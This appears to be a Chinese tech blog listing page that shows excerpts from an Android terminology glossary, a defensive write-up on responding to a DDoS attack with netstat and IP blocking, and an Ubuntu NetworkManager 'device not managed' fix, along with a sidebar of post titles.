使用，并不会对用户造成什么影响。之所以叫金卡，是因为他可以达到和上面SuperCID一样的目的，即让你跳过验证机制，从而进行刷机。那我们有　　　　　SuperCID了还需要金卡吗？不需要。那什么时候需要金卡？当我们没法通过破解得到supercid的时候，我们就需要制作金卡了。 11、APK：APK是Android Package的缩写，是一种文件格式，类似于windows系统里的EXE可执行文件。在android上，各种程序软件都是通过打包成APK的形式来发　　布的。他其实就是ZIP格式的文件包，可以用winRAR之类的压缩软件来打开。通过将APK文件直接传到android模拟器或android手机中运行即可安装相应软　　　件。我们从网上还有电子市场下载的android系统的程序文件，都是APK格式的。

浅谈Ddos攻击攻击与防御

root — Mon, 13 Feb 2012 05:41:45 +0000

EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2011-2-10 From: http://www.80sec.com/ [ 目录 ] 一背景二应急响应三常见ddos攻击及防御四根源及反击五总结一背景在前几天，我们运营的某网站遭受了一次ddos攻击，我们的网站是一个公益性质的网站，为各个厂商和白帽子之间搭建一个平台以传递安全问题等信息，我们并不清楚因为什么原因会遭遇这种无耻的攻击。因为我们本身并不从事这种类型的攻击，这种攻击技术一般也是比较粗糙的，所以讨论得比较少，但是既然发生了这样的攻击我们觉得分享攻击发生后我们在这个过程中学到得东西，以及针对这种攻击我们的想法才能让这次攻击产生真正的价值，而并不是这样的攻击仅仅浪费大家的时间而已。另外，我们发现大型的企业都有遭受攻击的案例，但是大家遭受攻击之后的应对措施及学到的经验却分享都比较少，这导致各家都是自行的摸索经验，依然停留在一家企业对抗整个互联网的攻击的局面，而对于攻击者却是此次攻击针对你，下次攻击却是针对他了，而且攻击之后无论是技术还是资源都没有任何的损耗，这也是导致这种攻击频繁并且肆无忌惮的原因。我们来尝试做一些改变：）二应急响应在攻击发生后，第一个现象是我们的网站上不去了，但是依然可以访问到管理界面，我们登陆上去简单执行了命令： netstat -antp 我们看到有大量的链接存在着，并且都是ESTABLISHED状态，正常状态下我们的网站访问量没有这么高，如果有这么高我们相信中国的信息安全就有希望了，对于这样的情况其实处理就比较简单，这是一次四层的攻击，也就是所有ip都是真实的，由于目前为止只是消耗了webserver的网络连接资源，所以我们只需要简单的将这些ip在网络层封禁就可以，很简单，用下面的命令即可： for i in `netstat -an | grep -i …

继续阅读 »

ubuntu NetworkManager显示“device not managed

root — Thu, 02 Feb 2012 09:27:48 +0000

来源：http://hi.baidu.com/p3rlish/blog/item/902132c3862b0a4ab319a836.html 朋友家是通过电信的无线猫PPPOE拨号上网的，没有安装无线路由，所以无奈之下只好在ubuntu下面的用pppoeconf来进行配置拨号上网，结果配置重启之后发现网络连接出问题了，网卡显示“device not managed”，所有的网络设备都不能用了其实问题先是桌面找不到NetworkManager,这个问题重装了一下解决了,后来发现网络管理为灰,网卡显示“device not managed”。解决方法, 1,gedit /etc/NetworkManager/nm-system-settings.conf 2,Now Change “managed=false” to “managed=true” 3,ps -aux|grep “NetworkManager” 4,kill 进程号

ZeroBox Notes

PSCP使用手册

pscp实现远程文件和文件夹传输

linux du 命令

Linux man命令的使用方法

linux 文件系统 文件类型

Linux as a Client to Windows SMB Shares

各种猥琐隧道证明 信任域、安全域划分很重要

Web应用漏洞的大规模攻击案例分析

我看APT攻防对抗：APT攻击的特性

metasploit的pivot实例详解

让安全成为IT系统的基础属性

TinyXml 中文文档

手机名词解释

浅谈Ddos攻击攻击与防御

ubuntu NetworkManager显示“device not managed

linux 文件系统文件类型

各种猥琐隧道证明信任域、安全域划分很重要